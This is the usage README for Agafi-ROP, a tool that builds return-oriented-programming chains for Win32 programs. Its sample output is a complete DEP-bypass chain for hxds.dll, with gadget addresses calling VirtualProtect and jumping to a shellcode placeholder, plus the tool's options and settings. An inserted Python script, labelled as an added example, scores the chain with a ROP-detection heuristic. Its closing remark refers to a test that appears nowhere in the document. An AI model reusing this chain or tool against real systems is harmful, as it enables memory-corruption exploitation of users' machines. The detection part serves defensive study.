-------------------------------------------------------------------------------------------------------

*** Agafi-ROP: A ROP-Chainer tool for Win32-x86 programs ***

A little help for you ...

-------------------------------------------------------------------------------------------------------

First of all, download "distorm3.dll" from "https://code.google.com/p/distorm/downloads/detail?name=distorm3-3-dlls.zip".
Then copy the 32-bit version of the DLL into the directory where Agafi is installed.

-------------------------------------------------------------------------------------------------------

Building a ROP-Chain:
  The gadget finder used by this tool is "Agafi.exe".
  This tool uses the PUSHAD/RET technique to build ROP-Chains that bypass DEP.
  For now, only ROP-Chains that jump to the "kernel32.VirtualProtect" function are supported.

-------------------------------------------------------------------------------------------------------

Building a ROP-Chain for "hxds.dll" (v2.5.50727.198)

Usage example:
  line in "settings.txt": "invalid_chars = 0x00"
  cmd: "agafi-rop -f hxds.dll settings.txt"

Output:
  sections_number = 5
  [x] Setting image base at: 51bd0000
  [x] Starting process
  [x] Module name: hxds.dll
  [x] Module base = 51bd0000
  [x] WRITABLE SECTION = 51c5b000 - 51c60270
  [x] IAT.VirtualProtect = 51bd1158

  Agafi Finding gadgets ...

  [x] NOT-NEG/RET gadgets found: 11
  [x] PUSHAD/RET gadgets found: 18
  [x] REG32=REG32/RET gadgets found: 2358
  [x] POP REG/RET gadgets found: 8269
  [x] REG=[MEM]/RET gadgets found: 84
  [x] JMP ESPs gadgets found: 46

  NTSD OUTPUT !
  eb eip c3
  ed esp+00 0x51bec8b6
  ed esp+04 0x51bd1158
  ed esp+08 0x51c055ac
  ed esp+0c 0x51c39648
  ed esp+10 0x51bd1a30
  ed esp+14 0x51bd1a30
  ed esp+18 0x51bec8b6
  ed esp+1c 0xfffffffc
  ed esp+20 0x51c1df88
  ed esp+24 0x51bd5737
  ed esp+28 0x51bec8b6
  ed esp+2c 0xffffffc0
  ed esp+30 0x51c1df88
  ed esp+34 0x51c08b65
  ed esp+38 0x51bd2731
  ed esp+3c 0x51c6026c
  ed esp+40 0x51bd1aae
  ed esp+44 0x51c0a4ed
  ed esp+48 0x51c0a4ec
  ed esp+4c 0x51c4a9f3
  ed esp+50 0xcccccccc

  rop_chain  = ""
  rop_chain += struct.pack ("I",0x51bec8b6) # "pop eax/ret"
  rop_chain += struct.pack ("I",0x51bd1158) # IAT.VirtualProtect ADDRESS
  rop_chain += struct.pack ("I",0x51c055ac) # "mov eax,[eax+0x00]/ret"
  rop_chain += struct.pack ("I",0x51c39648) # "xchg esi,eax/ret"
  rop_chain += struct.pack ("I",0x51bd1a30) # "pop ebp/ret"
  rop_chain += struct.pack ("I",0x51bd1a30) # "ADD ESP,4/RET"
  rop_chain += struct.pack ("I",0x51bec8b6) # "pop eax/ret"
  rop_chain += struct.pack ("I",0xfffffffc) # REGION SIZE
  rop_chain += struct.pack ("I",0x51c1df88) # "not eax/ret"
  rop_chain += struct.pack ("I",0x51bd5737) # "xchg ebx,eax/ret"
  rop_chain += struct.pack ("I",0x51bec8b6) # "pop eax/ret"
  rop_chain += struct.pack ("I",0xffffffc0) # PROTECTION
  rop_chain += struct.pack ("I",0x51c1df88) # "not eax/ret"
  rop_chain += struct.pack ("I",0x51c08b65) # "xchg edx,eax/ret"
  rop_chain += struct.pack ("I",0x51bd2731) # "pop ecx/ret"
  rop_chain += struct.pack ("I",0x51c6026c) # WRITABLE ADDRESS
  rop_chain += struct.pack ("I",0x51bd1aae) # "pop edi/ret"
  rop_chain += struct.pack ("I",0x51c0a4ed) # "RET NOP"
  rop_chain += struct.pack ("I",0x51c0a4ec) # "pushad/ret"
  rop_chain += struct.pack ("I",0x51c4a9f3) # "jmp esp"
  rop_chain += struct.pack ("I",0xcccccccc) # SHELLCODE ...
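The following Python script is an added example and is not part of Agafi-ROP. It parses the "ed esp+XX 0x........" lines that agafi-rop prints in its NTSD output and then looks at the resulting stack image the way a ROP-detection heuristic would: a run of consecutive stack slots that all point into a single module loaded at a fixed base, plus a reference to that module's IAT slot for VirtualProtect. The module range (0x51bd0000 up to the end of the writable section at 0x51c60270), the IAT address and the chain text are taken from the output above; the run-length threshold "min_run" is an assumption chosen for illustration, not a value used by the tool.

```python
# Added example, not part of Agafi-ROP: parse the tool's NTSD-style chain dump
# and score it against a simple ROP heuristic (pointer density into one module
# at a fixed base plus a reference to the module's VirtualProtect IAT slot).
import re
import struct

# Values from the page's output for hxds.dll (fixed image base, no relocation).
MODULE_BASE = 0x51BD0000
MODULE_END = 0x51C60270          # end of the last section listed in the output
IAT_VIRTUALPROTECT = 0x51BD1158  # "IAT.VirtualProtect" from the output

# The "NTSD OUTPUT" block from the page, embedded verbatim as sample input.
NTSD_OUTPUT = """\
ed esp+00 0x51bec8b6
ed esp+04 0x51bd1158
ed esp+08 0x51c055ac
ed esp+0c 0x51c39648
ed esp+10 0x51bd1a30
ed esp+14 0x51bd1a30
ed esp+18 0x51bec8b6
ed esp+1c 0xfffffffc
ed esp+20 0x51c1df88
ed esp+24 0x51bd5737
ed esp+28 0x51bec8b6
ed esp+2c 0xffffffc0
ed esp+30 0x51c1df88
ed esp+34 0x51c08b65
ed esp+38 0x51bd2731
ed esp+3c 0x51c6026c
ed esp+40 0x51bd1aae
ed esp+44 0x51c0a4ed
ed esp+48 0x51c0a4ec
ed esp+4c 0x51c4a9f3
ed esp+50 0xcccccccc
"""

_ED_LINE = re.compile(r"^\s*ed\s+esp\+([0-9a-fA-F]{1,8})\s+0x([0-9a-fA-F]{1,8})\s*$")


def parse_ntsd_chain(text):
    """Return the chain as a list of dwords in stack order (esp+00 first).

    A line that is not 'ed esp+XX 0xYYYYYYYY', or a gap between slots, raises
    ValueError so that a truncated or hand-edited dump is not silently accepted.
    """
    slots = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _ED_LINE.match(line)
        if m is None:
            raise ValueError("not an 'ed esp+XX' line: %r" % line)
        slots.append((int(m.group(1), 16), int(m.group(2), 16)))
    slots.sort()
    for index, (offset, _) in enumerate(slots):
        if offset != 4 * index:
            raise ValueError("gap in chain at esp+%02x" % offset)
    return [value for _, value in slots]


def chain_bytes(dwords):
    """Serialise the dwords into the little-endian blob the rop_chain string builds."""
    return b"".join(struct.pack("<I", value) for value in dwords)


def analyze_chain(blob, base, end, iat_slot, min_run=4):
    """Score a 4-byte-aligned blob against a simple ROP heuristic.

    Counts how many dwords point into [base, end), the longest run of
    consecutive such pointers, and whether the VirtualProtect IAT slot appears.
    min_run is an illustrative threshold (an assumption), not a tool value.
    """
    count = len(blob) // 4
    dwords = struct.unpack("<%dI" % count, blob[: count * 4])
    hits = [base <= value < end for value in dwords]
    longest = run = 0
    for hit in hits:
        run = run + 1 if hit else 0
        longest = max(longest, run)
    report = {
        "dwords": count,
        "pointers_into_module": sum(hits),
        "longest_pointer_run": longest,
        "references_iat_virtualprotect": iat_slot in dwords,
    }
    report["suspicious"] = longest >= min_run and report["references_iat_virtualprotect"]
    return report


if __name__ == "__main__":
    chain = parse_ntsd_chain(NTSD_OUTPUT)
    report = analyze_chain(chain_bytes(chain), MODULE_BASE, MODULE_END, IAT_VIRTUALPROTECT)
    for key, value in report.items():
        print("%-32s %s" % (key, value))
```

Run on the chain above, the heuristic sees 18 of the 21 slots pointing into the hxds.dll image, a longest run of 8 consecutive pointers, and the IAT slot for VirtualProtect; the three slots that fall outside the module are the two inverted constants and the 0xcccccccc shellcode placeholder. The same density argument is why a module loaded at a fixed, predictable base is the enabling condition for this kind of chain, and why a buffer of ordinary data (the benign case in the test) scores zero.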

-------------------------------------------------------------------------------------------------------

Options supported:

Usage: Agafi-rop option [settings.txt]

Options:
 -f module_name
 -rf module_name
 -p pid
 -rp pid
 -s agafi_snapshot
 -rs agafi_snapshot

Note:
 -r means reuse gadgets (-rf, -rp and -rs are the reuse-gadgets variants of -f, -p and -s).

-------------------------------------------------------------------------------------------------------

Supported settings in settings.txt:

Setting invalid chars:
 invalid_chars = 0x00,0x01,0x02,...,0xff

Setting modules:
 modules=MODULE1, MODULE2, ...

You can also pass parameters (but not objectives) straight through to Agafi, like this:
 eax=0x12345678
 test_range=0x401000,0x402000

-------------------------------------------------------------------------------------------------------
